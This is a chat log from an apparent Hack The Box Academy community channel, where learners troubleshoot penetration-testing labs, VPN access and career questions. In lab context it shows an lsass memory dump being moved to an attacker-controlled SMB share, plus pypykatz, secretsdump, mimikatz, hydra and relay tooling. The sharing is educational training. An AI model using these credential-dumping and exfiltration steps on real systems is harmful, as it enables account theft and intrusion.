┌─[us-academy-1]─[10.10.15.121]─[htb-ac-605555@htb-yp3zhmltaw]─[~/pypykatz]
└──╼ [★]$ pypykatz lsa minidump /home/htb-ac-605555/Documents/lsass.dmp
INFO:pypykatz:Parsing file /home/htb-ac-605555/Documents/lsass.dmp
ERROR:pypykatz:Minidump parsing error!
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
minidump = MinidumpFile.parse(filename)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
mf.file_handle = open(filename, 'rb')
^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
ERROR:pypykatz:Error while parsing file /home/htb-ac-605555/Documents/lsass.dmp
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
raise e
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
minidump = MinidumpFile.parse(filename)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
mf.file_handle = open(filename, 'rb')
^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
raise e
File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
minidump = MinidumpFile.parse(filename)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
mf.file_handle = open(filename, 'rb')
^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
it looks like it's working to me
it's in documents?
try using it against the actual dump file
if you read the last line it's pretty clear what's going on
but it won't tell me how to transfer it from windows to linux
is that something I do from previous section?
because I remember a section like that
you didn't transfer it?
do you have notes on how to transfer?
I'm on my PC running windows talking to you on the Discord app... and I got my Kali Linux installed on the SSD on my old laptop.. another user in here said I could run my own PwnBox on Kali Linux....
it doesn't say how in this section. I do have notes on it but it doesn't say that in this specific section
file transfers module comes wayyyyy before this module, are you just doing the individual module?
VMware is a huge headache to get to run properly in itself. Why can't I just use real Kali Linux instead of virtual?
they expect you to know how to do file transfers by now
you can but why do u need it to look like pwnbox?
hey guys, I'm completely stuck on the web enumeration module, could anyone tell me what's going on here? https://gyazo.com/d42997746fac783afda6c0be3f35f7d6
why does it say there isn't a wordlist?
because the file doesn't exist in that directory
try doing ls -la /usr/share/dirb/wordlists to see what's in there
no such file or directory
locate common.txt
there's some in seclists and wfuzz/wordlist, i guess i'll try those?
the seclists one should be it
ok thanks i'll try that
I have no idea. Someone suggested that. Are you saying I can still connect to the htb-student target machine from Kali Linux? I typed ssh htb-student@[IP Address] and it just freezes
i don't get it though, i've looked at a couple tutorials and they all start with that original command i sent /dirb/worlists/common.txt
anyway i'll try it now
are you connected to the vpn?
pwnbox has been updated since then
that's the usual spot on kali tho
no. and it just returned an error message: ssh: connect to host [IP Address] port 22: Connection timed out
you need to be connected first
ok, the seclists one got it, thanks guys
oh right ok, thank you
i have done everything from a kali vm and a vpn, no extra stuff
ways to run cmd commands as a different user on dc via evil-winrm session
can i just ask quickly, what's the -i flag in this?
case insensitive
All of these things don't work for transferring files to Linux from Windows even with the Python server running
PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
AccessException
+ FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand
PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\home\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\home\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
xception
+ FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
xception
+ FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\
move : The UNC path should be of the form \\server\share.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], ArgumentExcep
tion
+ FullyQualifiedErrorId : MoveFileInfoItemArgumentError,Microsoft.PowerShell.Commands.MoveItemCommand
PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
xception
+ FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
Ok how do I connect?
can someone point me in the right direction?
oh sweet good to know, alright thanks again guys
I don't think I'm using a VPN
what i like to do is create a share and mount it in linux. or use updog, if u have rdp access
I have rdp access but I'm unsure that mounting it is the point of the lesson
or even part of the point
you need to read the error messages. this is going to be an important skill for you. do you see the error message in your paste?
I'm stuck on this:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I ran:
ss -tuln4 | grep -v '127.0.0.1' | grep 'LISTEN' | wc -l
it gave me the answer: 8
answer is incorrect
ya directory not found
hold on a sec I will play with it but I tried switching directories
there are more errors too
Why do I have to connect to a VPN? Why can't I just connect to the HTB Pwnbox directly from my stand alone Kali Linux OS on my laptop?
or why can't I spawn a Target system box on HTB and connect it to with Kali Linux?
you can but vpn connection is needed
I am coming closer but it says I don't have permission to access the share on Windows
is there a way to copy text from my local machine and paste in the pwnbox?
PS C:\Users\htb-student\AppData\Local\temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\htb-st...\temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
AccessException
+ FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand
I even made the folder
and what does the error say
right, there you go
so what do I need to change the file type?
you don't have permission to write to the folder
so how do I get permission? it doesn't say how in the module
is that the name of the impacket smb share?
CompData
So I can use my stand alone Kali Linux OS on my laptop as my attack environment and connect to the HTB Target machine by running a VPN? OK went to that URL and it says to type in the terminal openvpn academy-regular.ovpn and then I got the error message Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn
wait I might have fixed it
this isn't the place for that
did you download it?
I think I can go to next step
run with sudo if you did download it @mental tapir
I am such a noob and forget even the most basic Linux commands to change the directory. Do I need to cd to the Downloads folder to run it?
@coral crest i don't think medusa is on the pwnbox
no just list the path
I must be tripping, why does the module explain using the tool if the tool is not in the pwnbox? (also it is in the parrot or kali)
@safe star -- is the username to the left of the @ symbol? the path should be ~/home/kali/Downloads but it isn't working... ugh
ok section completed
what command are you running?
you can install it on the pwnbox
I guess I'm just too noob and I don't understand how to change paths properly. I'm now in /Downloads folder...
and I just ran the ovpn file
it doesn't matter what folder you're in as long as you put the correct path to it
yep, I am just trying to figure out which box is more complete (kali, parrot or definitely only use pwnbox)
i only used kali and it has most things already installed
you would have to keep downloading stuff every time you use the pwnbox
it is still booting... does it take a long time to run the VPN?
did you have this same problem? (I tested with untest version of kali, and the vbox version)
yeah that happens sometimes with smbmap, but i also use crackmapexec and smbclient
i use cme to list what privileges the shares have and smbclient to connect
@safe star after 5 minutes running academy-regular.ovpn it is still loading/thinking doing something.. I don't know...
send a screenshot of the command
or codeblock
sudo openvpn academy-regular.ovpn
it's not supposed to disappear, just close it and it will run in the background
use "ip a" to verify the tun0 interface
I hope this is my last question: do you guys recommend always using virtual machines? In the exam (CPTS), can you use your own host, or will they provide a VM?
since I have been wasting more time to troubleshoot stuff (tools, scans, whatever), I want to stick to something and keep it til the exam
i haven't taken it, but if your pwnbox ends up closing during the test you will lose all data on it
what should it say under the tun0?
The Python Library Hijacking Module mentions, "We can execute this script with the privileges of another user, in our case, as root," referring to the file mem_status.py with the permissions -rwsrwxr-x 1 root mrb3n. However, isn't this incorrect? Unless we have sudo rights for the Python interpreter, the script will execute under the current user's privileges, not the SUID user.
Is there a method to run a .py with the SUID user without needing sudo rights for the Python interpreter? If not, doesn't this render the entire SUID bit ineffective because we can run the interpreter as sudo anyways?
I tested this scenario and found that having sudo rights configured as (ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py allowed it to work with or without the SUID bit for the script to achieve root access. Maybe I'm just having a moment of confusion.
an ip like 10.10.x.x @mental tapir
so it's running and I can proceed...
You can use your own VM.
guys i haven't started learning cyber yet but i am very interested, how do i go about seeing if i should get a degree in this field, because who knows, i may not like it after all
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
probably if you "chmod +x" the file
in that case you can only read it and use sudo tho
turn the file into an executable by adding the execution right
chmod +x mem_status.py
./mem_status.py
thanks for the reply. But I think you got me wrong, the file is already executable (otherwise it would be a capital S). The question is if it's possible to run a .py with the SUID bit set, as the SUID owner, WITHOUT sudoers set up for python3. You know what I mean? But after some googling I think it's not possible
ok now my terminal freezes every time I ssh to the target box IP... is my laptop too crappy old and slow or what?
on my Kali Linux graphic at the top it shows the CPU usage and it is peaking at max CPU 100% usage for some reason... why is it doing that?
you can use the command top to see what processes are using cpu.
it says the Xorg command and splunkd and python3.9 are all running in the background... a few days ago I tried to set up my own Splunk and failed.. but it's showing I never stopped it running I think.. what is the command to get all them shut down?
should I just restart the laptop?
I think I made Splunk auto run at startup so that's not going to fix it...
try sudo systemctl stop splunkd.service (idk the service name)
i ended up just rebooting the laptop and the CPU isn't maxing out anymore nor is the Splunk running anymore... but the stupid Terminal keeps lagging big time after ssh to the htb-student target IP....
okayy so I'm doing the basics, os fundamentals.
my terminal is giving me an odd error
ssh: Could not resolve hostname htb-student: Name or service not known
i assume the error is in my syntax
but im using the format that was provided
that's just ssh lag
type ssh htb-student@[IP address]
wow! Really? How will I ever get any work done with this kind of lag? Is there a way to reduce the lag?
yeah it was syntax
i was putting a space between the username and at symbol
thx
by getting used to it
I'm on this step and I got error message: htb-student is not in the sudoers file. This incident will be reported.
What did I do wrong this time?
do you guys recommend going to college for cyber security? or is it a waste of time and money
waste of time and money. Lots of BS writing research papers.
@mental tapir yeah i put that into perspective, i just want my best chance at succeeding in this field and i just didn't know what was best for me
I enrolled at Utica University for a Masters program and it was so much tedious BS research writing. Lots of busywork. I busted ass, got a very high GPA, but toward the 2nd half of the program I got to doing the hands on labs and they were horribly designed and very poorly managed and the professor was next to useless
it's just an example to set up on your own, you are currently using ssh to even run that command
I wouldn't go the college route. You're better off just reading the CompTIA A+, Network+, and Security+ study guides yourself at your own pace and then get hands on practice setting up labs at home all for free
At the end of the day, it is down to what works best for you. Are you the kind of person that can drive yourself to learn, to improve and work towards goals like certifications, or do you prefer instructed and lead education?
IMHO, mainstream education isn't quite there with security yet, but that is just my own personal opinion, and what I've observed.
A degree can open doors, but so can certifications earned under your own steam. Both will cost money, both will have value.
The degree programs at all universities are insanely overpriced. The cert exams are a fraction of the cost. Don't enroll in a college degree program believing that the professors will help guide your learning process. That is not the case. It's because they have too many students in their classes and they cannot hand hold you every step of the way, and if you cannot keep up with the pace of the class you get left behind, costing you a few grand just for that one course. It's asinine.
I agree, but self driven learning is not for everyone. I could just say "YEAH GO BUY HTB CERTS IT'S THE BEST", but everyone learns in their own way.
There's also another aspect from University, which is the social aspect
Ok, that's not going to get you a job
But.. it's still an aspect
I'm more of a hands on learner and sometimes need my hand held, which is maybe where uni may come into play, but i agree it's extremely overpriced and i will get better value out of learning it myself
With hands on, you do always have communities to reach out to
I'd try hands on first with whichever platform you choose
See how it works out for you 🙂 It's a big decision
Exactly. Because this Discord community is way more hand holding than you will ever HOPE to get from any overpaid lazy professor at a private university with small class sizes no less
At least with hands on self driven learning, you are not locked in to three years
You choose your pace
quite overlooked in the degree vs cert aspect tbh
I do see you guys have people in this discord that help each other out and it's nice to see that, I'm going to try and learn this on my own. other than HTB, which i will be using, what other platforms are out there to help further my education other than HTB
for someone out of HS, a degree even if not beneficial in terms of education, will benefit you in life skills in general
Yeah... the few years I spent in college (and then dropped out of every year, because I was learning nothing) did help me to become more social, make some friends etc
My gripe with HTB is that the modules are also poorly written and I'm a paid member of HTB...
I was still awkward a f afterwards lol, but at least I knew there were people out there
socialising, being on your own, networking skills, friendships, and even you know:)
😦 sorry to hear you feel that way - we are always open to feedback via #1234357888114364508
i still hate uni tho
other than HTB what other websites are there that are similar to this, or do you think HTB is the way to go to further my education to get certs
it is hard to answer in HTB discord server but a quick google search will help you
@0xConda Some communities: @hackthebox_eu https://t.co/uQNgRSJ1CA, @srhoe (OwlSec) https://t.co/jVGYOLQj5g, @NahamSec https://t.co/MbuweAGrLE, @RealTryHackMe https://t.co/3AQ1NPl6Kv. Learn from others, engage and grow. The world is your oyster!
@0xConda There are so many platforms out there that can get you started now, it's insane. Hack The Box (biased obviously), Port Swigger, Try Hack Me, free courses at universities like University of Maryland, Coursera, Offset have some free stuff too.
A couple of lists 🙂
there is letsdefend.io and tryhackme.com
i used tryhackme until i was top 9k then switched over to htb
made htb easier to understand after
g0blin are you one of the writers of the modules at HTB?
he is the writer of the writers
OK, I'm trying to give you constructive feedback... so how come in the module for the Fundamental Linux Commands... problems that users may run into are not documented and pre-anticipated?
For instance, what does this error mean? htb-student is not in the sudoers file. This incident will be reported
hi guys, idk if I'm allowed to uh ask this here but i was wondering if there's any way I can hack back into my stolen google accounts?
no only google can help you with that
well if hackers from the dark web can hack into my accounts and steal them I can steal them back-
nah it's illegal though, no one here can do that for you. contact google.
not if FB1 can get you first hehe
I'm aware it's illegal, I already tried contacting google, none of it is working
huh?
sorry, that's your only recourse. like i said no one here can help you and you're asking people to do illegal things. no one here is going to prison for you.
@mental tapir I'll certainly pass that on to the team. Could you share the command you're running in DM please?
DM you?
Yeah
hey guys i have 70 cubes and want to start my first module, what do you recommend i do first. i have a lot of interest in pen testing but that doesn't matter because i need to start on a fundamental
Linux fundamentals would be a good start.
thank you @shut quest
Would the File Transfers module fall under the Post-Exploitation phase, or the Exploitation phase?
i would say post because if i remember correctly the techniques in this module suppose you already have access
That's what I was thinking, but in the Pentesting path it seems to come before any Exploitation modules so I just wanted to be 100% sure
no, the path has nothing to do with it. it is not designed in this way; each module has its own stuff, if that makes sense. so it's not that the first 1/4 will teach you pre-exploit and u will learn post-exploitation in the next module, no, it's like mixed: each module will teach some stuff about everything. i hope this clarifies the idea
Figured as much. Makes it more annoying for organizing my notes, but I'll work around it.
yup i know what u mean, i'm studying the path also so i can relate to this issue. the way i'm planning to do it is writing the notes for each section of the modules, and after finishing the path i will revisit the notes and rearrange everything the way u mentioned, so it's faster to access, because a lot of commands overlap and in this way i can refresh my memory about everything i learned
guys i'm doing the domain trust attack - linux. i already compromised the parent domain but the question asks for bross hash but there's no tools on the parent machine. am i supposed to upload some tools or am i missing something here?
The lab is broken.
I am not getting email.
SMTP Injection using CRLF
https://academy.hackthebox.com/module/191/section/2057
Ideally it should show as Connected as shown in Github
https://github.com/mailhog/MailHog/raw/master/docs/MailHog.png
Right now I'm trying to use Hackthebox for the training. Is it okay to use Kali Linux over Parrot OS or is it better to stick to the original?
kali is fine
whatever you want its fine
I used Kali back in university while I had a CIT class. I guess I can keep using it, but right now I'm learning about web fuzzing.
First module but it is a start.
They have shown many ways to dump hashes
without tools? which section? i went back to living off the land and found nothing about dumping hashes
not sure why my q was deleted ? anybody ?
I don
I don't think we can use the instances from our browsers to use the boxes, right?
How do I have an uneven number of cubes? 😂
I wanted to test their mastered distribution for 3 months that problems the best is kali or a custom Debian by you
hello, I'm doing Windows Privilege Escalation DnsAdmins. I'm trying to start the dns after stopping but it's not starting. I have used sc.exe start and net start, none of them work. Some help would be appreciated.
Password attacks - password mutations. I downloaded the resources from the top right corner. The rules file is very extensive and when I generate the mutated wordlist, the original 203 words spit out 187775 alterations. Obviously it takes forever to bruteforce || regardless which service I attack ||, is this expected or am I missing something? Before finally writing here, I have tried different tools and services. Please advise. Edit to this: took away duplicates and it is down to 94000. Still a lot
Finally worked after spawning a new machine every time, it took me like 4 attempts
I had left the list like that, I just had to increase the threads and attack a common service (not the ssh)
yeah, I'm not attacking ssh. Do you mean running the original, not mutated wordlist?
Our cubes are of same digits
I'm running the mutated list with hydra with 16 threads, you can even put it at 32. in general it took time. after that, something I discovered is to determine the password policy to reduce the size of the passwords in the list, but you need valid login information to authenticate yourself to the domain
Did everyone's cubes decrease by one or something? 🤔
Sorry I confused you to determine the password policy it’s in the AD module
Ah, ok
Hmmm I chose ftp
yeah tried that too...
It takes time you have to be patient for this module
Hey
i need some tips on password attacks skills assessment easy
I'm assuming i have to brute force into SSH or FTP but after trying many combinations i can't get any passwords
I did exactly what is in the course I think it took me more than 40 minutes to find the user’s password on the ftp service
i'm dying any hints ?
Hi. I'm doing the first class of windows fundamentals. I'm trying to connect remotely to the vm of htb-academy using freerdp in my linux terminal but it says: [10:03:26:731] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:26:731] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:929] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - freerdp_post_connect failed
the command I'm using is the one which is mentioned in the academy: xfreerdp /v:<targetIp> /u:htb-student /p:Password
It was 30 minutes of waiting for me or sure to take the users and passwords provided on the ftp service
you ran openvpn ?
I’m not there yet 😭
I did it with and without vpn but it doesnt work
just do it from your own host
try changing vpn servers
open two terminals or tabs; in the first one run openvpn with the vpn file, then go to the second window and try to rdp with it. this must work
you mean using secretsdump ? i tried to use it didn't work
why not
just given pass and users?
without changes?
Ok, now it works thanks to all
Yes, I hadn’t changed anything here
what's the error mate, just saying it doesn't work is not helpful
my bad "DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid."
is this the way is supposed to be solved ? using secretsdump
have you followed the steps and made the ticket?
htb-student_adm is only a valid user on the child domain
yes i'm already in the shell and i have exported the ccache if that what you mean
tried to use the hacker user that we created and used it with the no-pass flag, that didn't work, it says status_logon_failure
what's the command
Finally, got it! 🙂
use the same command as the psexec
Why wouldn’t you need tools
i don't know maybe they want me to do it in some way that u don't need tools
Take it to DM if you'd like to help.
Sounds like a module over Tier 0, and there are commands being shared here which could be considered as spoilers.
goblin those commands are very standard for secretsdump
didn't see the message so I'm guessing what it is
Ok, well I was going on the module tier.
will try again .. anybody can share any hint on cme skill assessment q3 "Gain access to the DEV01 and submit the contents of the flag located in C:\Users\Administrator\Desktop\flag.txt. " ? i have j..s ntlmv2 hash but no you with hashcat and rockyou.. tried ntlmrelayx but i only get " Received connection from INLANEFREIGHT/j***s at DC01, connection will be relayed after re-authentication".. and no ntlm hash 😐 should that work ? i'm on latest parrot so maybe something is broken here 😐
i had to upload mimikatz and just extract the hash from it i'm not sure if this is the way i'm supposed to solve the question but it worked
that works too but so does secretsdump, I have tested it
ntlmrelayx doesn't capture the hashes, it will just relay. use another tool
is it okay if i DM you the secretsdump.py command i used ?
it's exactly the same as the psexec command given in the module, just swap psexec.py with secretsdump.py
if your psexec command worked so will secretsdump
resp..r i assume ? i used that to get ntlmv2 .. or there is yet another one i should use ?
yep, if you got the hash then crack it
i did this, it's not working, i get this (and yes i used -just-dc-user): "Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user"
using -just-dc user <username> i get this "Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)"
as above - not in rockyou 😐
probably gave it the wrong name then, don't use -just-dc user just dump all the users
is there any other dict i should use ?
it is
make sure you've copied the hash correctly
you mean just using -just-dc ? its not working
so you're telling me that the same command worked for psexec but not secretsdump
go try psexec again
i restarted the machine i will try everything from the start
lol 🙂 dunno how i copy it wrong - you are absolutely right 🙂 many thanks
yup works now thanks man, i think because i used both the manual way and the automated one things got messy, but just using the manual one, that worked
need help on win privesc, can i dm anyone?
Hi, could someone please help over DM with "HTTP Attacks Skills Assessment"? I've got the TE.CL via te.te just as the hint pointed and crafted the payload to bypass WAF, but the email is not received. I think I may be failing with proper URL encoding, but I've already tried all that came to mind.
For skills assessment 2 windows privesc i succeeded in enabling all privileges || SeChangeNotifyPrivilege|| and|| SeIncreaseWorkingSetPrivilege||, after that i've enabled the binary ||EnableSeLoadDriverPrivilege.exe|| but nothing. The course states that the two privilege activators can be used to activate SeLoadDriverPrivilege with the .\EnableSeLoadDriverPrivilege.exe binary. if someone has a hint
Did you by chance run an automated enumeration tool that would identify potential vulnerabilities?
😭😭😭 no I directly did whoami /priv to see what the rights of htb-student are
I threw myself into a rabbit hole 😭
I recommend enumerating more.
Thx
Hi, could someone help me out with Elastic module? I need to find the common date on which all returned events took place in pre-created visualization (answer format: 20XX-0X-0X). And I think I found it, but it doesn't accept the answer
That's not wrong to run that command, but I would fully enumerate the host. Have a solid enumeration process and stick to your process.
But it’s misleading because I saw 2 privileges that were stated in the courses but it is true that the current user is not part of the administrator group or printer groups so I was wrong in my process
There will be plenty of things that can be misleading, which is where the more information you have, the easier it will be to identify a path or things to research.
Yes you’re right thx for advice 🫡
Anytime.
damn, no idea what I'm doing wrong -- all I needed to add was the @timestamp row
just a sec, I'm only a few sections ahead and I'll review my work
@glad patio mind linking me to the exact section you're on?
Hello dear friends, is going through MySQL the only viable thing to do in the Easy Lab of Attacking Common Services?
The forums suggest there are two methods, but I can only see two methods to read the flag through using MySQL, so I'm confused if I'm missing something. People are mentioning phpMyAdmin but it's impossible to visit it. It gives me a Forbidden error.
Quick question about the HTTPS/TLS Attacks skill assessment: how can I get access to the mail it's talking about? I didn't find any corresponding endpoint or similar. Where should I look instead?
Hello. Can anyone help me with the Information Gathering - Web Edition Skills Assessment? I've added the IP to my /etc/hosts, however when I try to use whois I'm getting literally nothing. It is not just with whois; ReconSpider and FinalRecon also give me nothing. Is there anything I'm doing wrong?
Also I've tried dnsenum but it gave me some errors....
These IPs and domains are not public so you can't really use whois on them.
https://academy.hackthebox.com/module/18/section/74
Trying to install NFS, but it says htb-student is not in the sudoers file. Why does it say that?
I recommend to reread the DNS and virtual hosts section
oooh, I've forgotten. thank u
https://academy.hackthebox.com/module/18/section/74
why do I have to be in root to install NFS? I connected to a VPN on a Kali Linux machine... Why doesn't sudo work?
So I just did this one again, since it was updated and I am pretty certain they give you a .com domain for some of the questions, i.e., whois, etc., and a vhost with .htb for other questions.
He is in the skill assessment.
Yup, and I'm pretty sure the first question says to use a .com domain to identify the IANA ID, unless I am on the wrong assessment.
You are right, my bad, I didn't look at the first question.
You can't sudo in your Kali machine?
It is possible that he confused .com with .htb and that is why it didn't work.
All good and the only reason I remember is I just redid that one.
I can, but it's giving me an error that htb-student is not in the sudoers file.
So, instead of ssh htb-student@[IP Address] I would do ssh [Kali user]@[IP address]?
are you doing the Network Services section?
yes
That section didn't ask you to SSH in.
So do it on your own host or Pwnbox.
but that's just a demo, you don't have to install and enable the nfs service
Just a demo? It's part of the lesson... Why wouldn't it work?
I don't have to... but that's the whole point of getting familiar with Linux... to have a working machine to practice on...
.
.
Then why did someone tell me to connect to the HTB target through VPN?
because some sections require you to connect to the target, just not the one you're currently doing
pls do the Intro to Academy module
I have done it
then you should know that there are different types of targets you might need to connect to
The exploit didn't work? Can't say without more info. Read #welcome to get verified so that you can send screenshots.
Just a quick question for the Public Exploits module: someone said yesterday Pwnbox had been updated at some point, which I think buggered up the lab. nmap -sV shows OpenSSH version 9.2; does this matter? searchsploit is returning no vulnerabilities, but it does show vulnerabilities when I check 7.2 like it says in the module reading.
go to the ip and port given in your browser and take a look
What am I looking for, sorry?
what do you see?
exactly, look that up
Hello, I have a question regarding the Kerberos Attacks module
How can I practice the commands and attack steps using my own Windows VM instance as an attack machine?
Tunnel or set up your own lab ?
Am I along the right lines with running the auxiliary/scanner/http/wp_simple_backup_file_read exploit?
tunnel
try
Sorry that was 2 options you have, ignore the question mark
Yeah, I have done that and it was successful, so am I now trying to find files to read?
oh, my Pwnbox got disconnected
Struggling for a long time, any suggestions on how that can be achieved?
your goal is to get the flag
I'd recommend setting up your own lab, you can look into GOAD if you don't want to set it up from scratch yourself
I already have the Windows VM setup. Want to use that to try attacks on a target from the Kerberos Attacks module
Fails with an "Unknown error (0x80005000)"
And also , when trying out the provided target, the given RDP password is incorrect
Your own Windows VM is not enough, you need an AD setup.
why would it be incorrect
It is! Unable to connect to it
Connecting to the VPN of HTB --> Target of Kerberos labs --> using a Windows machine instead of Linux
are you familiar with AD? maybe you should do the tier 2 AD modules before doing a tier 3
if you want to connect through windows rdp, you'll need to specify the domain
I would even suggest Intro to AD, then the AD module of CPTS.
I added the Intro module to my path, and although a bit redundant at times, it helped me having a bit of a clearer vision of what was AD.
Because the AD module of CPTS is DENSE omg
👍
Didn't occur to me to set the other options of the exploit apart from RHOSTS, aha.
finished it now anyway, thanks xre0us
"Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain" -- I don't understand the question or its answer.
Can someone explain it to me?
An FQDN is the one which has hostname.secondleveldomain.TLD. When querying dig with the IP they provided for the DNS server I don't get any answer, but when I queried the NS record it gave me the nameserver, and that's the answer to this. I don't understand why the nameserver is the only answer here.
because it’s asking for the FQDN for the DNS server
which is the name server for the website inlanefreight.htb
dig -x 10.129.166.197
this will do reverse lookup on that ip
So it means that there is no PTR record.
I had to google how to start up the Apache server... why does this module https://academy.hackthebox.com/module/18/section/74 just assume that you know what command to use to run the Apache server? Instead it just says "After we have started it"... Sure would be nice for the writer of this module to have explained how to do that instead of forcing us noob learners to have to google external sources. These lessons are not noob friendly. I don't mean to be a snob, but how hard would it have been to include this crucial instruction just to make the learning experience smoother and less troublesome than it has to be? service apache2 start? I'd understand if they omitted this instruction had it been explained in a prerequisite module, but there are no prerequisite modules/lessons to learn this since this is already a Fundamental module... In a Fundamental (super easy) beginner level course for noobs and already they assume we know all this? To know the correct command I had to watch this video https://youtu.be/JULMHrhCXjE
Good job, you've used Google; that's an essential skill in cyber.
Yes, that is what my brother tells me who's already landed a 140k/yr job doing this. Get used to googling everything...
your goal is to find the fqdn of the name server
yeah, the module doesn't even ask for that lol
I just read back through that section, like, "I don't remember having to do all that 🤨" lol
yeah, it's not discussed in the section
but I was thinking of doing a reverse lookup on this IP to find the domain
so what would you tack onto a dig query if you were looking for the NS?
I'm doing the AD skill assessment. I found the user and the password and I tried to create a PSSession and it worked, but I can't cd or dir. I can use whoami, which returns the username on MS01. Any idea?
Can anyone tell me how to get started with Bluetooth attacks? Especially bluebugging.
